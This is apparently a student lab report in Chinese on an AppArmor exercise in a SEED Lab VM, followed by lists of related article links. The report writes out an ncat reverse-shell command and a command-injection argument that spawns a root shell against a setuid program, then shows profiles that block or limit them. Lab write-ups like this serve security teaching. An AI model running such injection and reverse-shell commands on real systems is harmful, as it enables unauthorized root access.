2.1 APPARMOR实验

2.1.1 实验目的

AppArmor是linux系统中提供的一种强制访问控制方法，与SELinux类似，AppArmor 通过提供强制访问控制(MAC) 来补充传统的Linux自主访问控制(DAC) 。AppArmor允许系统管理员通过为每个程序进行权限配置，来限制程序的功能。配置文件可以允许诸如网络访问、原始套接字访问以及在匹配路径上读取、写入或执行文件的权限等功能。本实验的学习目标是让学生根据不同程序的访问控制需求，使用AppArmor进行访问控制配置，理解最小特权原则，并了解如何通过该方法抵御攻击。

2.1.2 实验内容、步骤及结果

实验环境：SeedLab Ubuntu16.04 32bit

任务1：ping的控制

针对ping(/bin/ping)程序，使用apparmor进行访问控制。尝试修改profile，使得ping程序的功能无法完成。

图2.1.1 修改/etc/apparmor.d/bin.ping文件

上图2.1.1所示为控制ping程序profile文件，为了使ping失效，只需要删除图中序号1所示行，也即该程序不能打开socket，也就失效了，结果如图2.1.2：

图2.1.2 ping功能失效

任务2：反向shell控制

(1) 编译下图的程序，设置setuidroot权限；通过命令注入攻击，创建reverseshell。

通过ncat命令注入，获取反向shell，如图2.1.3所示，直接获取到root权限。
ReverseShell：
ncat -lvp 5555(Attacker)
ncat 127.0.0.1 5555 -e /bin/sh
./command " readme.txt;ncat 127.0.0.1 5555 -e /bin/bash"

图2.1.3 注入攻击test程序创建reverseshell

(2) 使用apparmor对该程序进行访问控制，禁止attacker通过命令注入创建reverseshell；
为了禁止reverseshell，我们直接禁用ncat即可，profile文件如下图所示：

图2.1.4 禁用反向shell的profile文件

结果如下图2.1.5所示，可以发现注入失败：

图2.1.5 注入失败

(3) 使用apparmor对该程序进行访问控制，允许attacker通过命令注入创建reverseshell，但将attacker在reverseshell中的能使用的命令限制为ls,whoami；
要允许命令注入，就是要允许ncat执行。经过实验发现apparmor的profile规则匹配应该是默认拒绝的，所以我们限制命令为ls和whoami就直接允许这两个命令即可。profile如下图2.2.6所示，ls和whoami的配置见2，3处，ncat的配置见1处，需要注意的是，/bin/bash的权限也一定要给，见4处。

图2.1.6 限制反向shell执行命令的profile

结果如图2.1.7所示，可见，执行whoami和ls命令没有问题，然而包括cp,rm,mv，ping等其他指令均不能执行。

图2.1.7 限制的反向shell攻击结果

apparmor是一个很新的东西，感觉还是有点用，网上资料很少，在此记录这次实验过程。如果想真正搞懂apparmor,可以参考下面的网站：
https://wiki.ubuntu.com/AppArmor
https://help.ubuntu.com/community/AppArmor
https://gitlab.com/apparmor/apparmor/-/wikis/AppArmor_Core_Policy_Reference
https://www.apertis.org/guides/apparmor/
https://blog.csdn.net/u014440610/article/details/37940675
https://medium.com/information-and-technology/so-what-is-apparmor-64d7ae211ed
https://blog.csdn.net/culintai3473/article/details/108788329

华中科技大学网安学院信息系统安全实验 系统安全 APPARMOR相关推荐

1. 【2020年保研记】浙大软院+中科院信工所+北师大人工智能学院+华中科技网安学院+四川大学网安学院+中山大学系统科学与工程学院

   很喜欢<游褒禅山记>里面说的一句话:而世之奇伟.瑰怪,非常之观,常在于险远,而人之所罕至焉,故非有志者不能至也. 保研是为了去更好的学校,更是一个对自己人生的极高要求,唯有会当凌绝顶,才能 ...

2. 华科计算机学院和网安学院区别,华科网络安全和武大网络安全到一起，国家网安学院迎来首批学子入学...

   30日,国家网安基地网络安全学院(以下简称"网安学院")正式开学.来自武汉大学.华中科技大学网安学院的首批600多名本科生.硕博研究生,正式搬迁入住.30日早上7时,两路记者,分别 ...

3. 华科网安学院和计算机学院,武大华科顶尖网络高手聚集到一起，国家网安学院迎来首批学子入学...

   长江日报-长江网讯30日,国家网安基地网络安全学院(以下简称"网安学院")正式开学.来自武汉大学.华中科技大学网安学院的首批600多名本科生.硕博研究生,正式搬迁入住.30日早上7 ...

4. 华中科技大学成立人工智能学院，两名长江学者坐镇

   整理 | 一一 出品 | AI科技大本营 AI科技大本营消息, 1 月 26 日,华中科技大学宣布成立人工智能与自动化学院.人工智能研究院正式成立. 据中新网报道,湖北省人民政府副省长陈安丽,中国工程 ...

5. 华科计算机科学学院夏令营,2018年华中科技大学全校各学院保研夏令营信息统计...

   原标题:2018年华中科技大学全校各学院保研夏令营信息统计 华中科技大学是教育部直属的全国重点大学,由原华中理工大学.原同济医科大学.原武汉城市建设学院和原科技部干部管理学院于2000年5月26日合并 ...

6. 东南大学网安学院研究生毕业，就业如何？

   东南大学是一所985大学,网络空间安全学院是成立不久的网安学院,毕业生情况如何?给大家转一下网安学院的毕业生报告,供参考. 1 学院介绍 为适应国家网络空间安全的重大战略,发展和建设高质量.多层次网络 ...

7. 山东大学网安学院2020-2021学年信息论与编码期末考试

   山东大学网安学院2020-2021学年信息论与编码期末考试 期末考试 信息论部分 1.描述熵的定义,证明联合熵与条件熵的关系(书上都有证明的,这是一道送分题) 2.只记得最后一问是证明 D(p||q) ...

8. 华中科技大学2021计算机学院,2021年华中科技大学计算机考研科目

   2021年华中科技大学计算机考研科目都有哪些?对于备考计算机专业的考生让我们一起看下华中科技大学计算机考研初试具体信息吧~ 计算机科学与技术系: 081201计算机系统结构(6,推免比约60%).08 ...

9. 华中中科技大学php,华中科技大学船舶与海洋工程学院

   船舶结构力学实验室 该实验室由船舶与海洋工程系管理,使用面积约1400平方米.有兼职教师1人及工程师1人.其中主要装置有静动两用平台1座(20×10米).承载能力300吨-米:冲击试验水池1座,池体1 ...

最新文章

1. Android 补间动画(Tween Animation)
2. 30个免费网页图标字体以及使用方法
3. 04. 字符串合并与拆分写法小结
4. DOS命令查看网络信息
5. 洛谷 P1200 [USACO1.1]你的飞碟在这儿Your Ride Is He…【字符串+模拟】
6. php.amazeui,AmazeUI 导航条的实现示例
7. Nginx的TCP运行时健康检查
8. STM32工作笔记0071---内存管理实验
9. sql modify 会丢失数据么_为什么U盘的数据会丢失？找对方法，轻松应对
10. 送书！60 本签名书！
11. 计算机专业论文答辩ppt,计算机行业毕业论文答辩PPT.pptx
12. 华为天才少年——稚晖君！
13. 少年包青天里的一个分尸案 来龙去脉
14. 用java判断闰年和平年
15. 安卓手机数据备份与恢复方法汇总和操作详解
16. vertex系列芯片和zynq系列芯片结构的异同_使用ZYNQ实现复杂嵌入式系统，真的好用！...
17. c语言标识首字母不能是,c语言的标识符由哪字符组成
18. vscode插件(个人正在用的)
19. Android中实现截图的几种方式
20. hdu5078 hdu5074 顺便写一写鞍山

热门文章

1. 20200521，看到Java的爱情我羡慕了...
2. 必应发狂了！ LeCun马库斯齐喷ChatGPT：大语言模型果然是邪路？
3. 职教高考专业课考计算机,“春季高考”将升级为“职教高考”，对我们考大学影响吗？...
4. EXCEL保存时出现“由于共享冲突,您的更改不能保存到x‘x‘x‘x.xlsx0”解决方法
5. 开源数据库的国际化思考与实践
6. 佛学入门四书·佛教常识答问 读后感
7. Unity 开发总结之VLC Player for Unity插件的使用
8. Google搜索技巧 转
9. 如何在计算机安装本地磁盘e,本地硬盘安装Win7旗舰版系统的详细教程
10. 代码保护软件VMProtect用户手册主窗口之控制面板“项目”部分（4）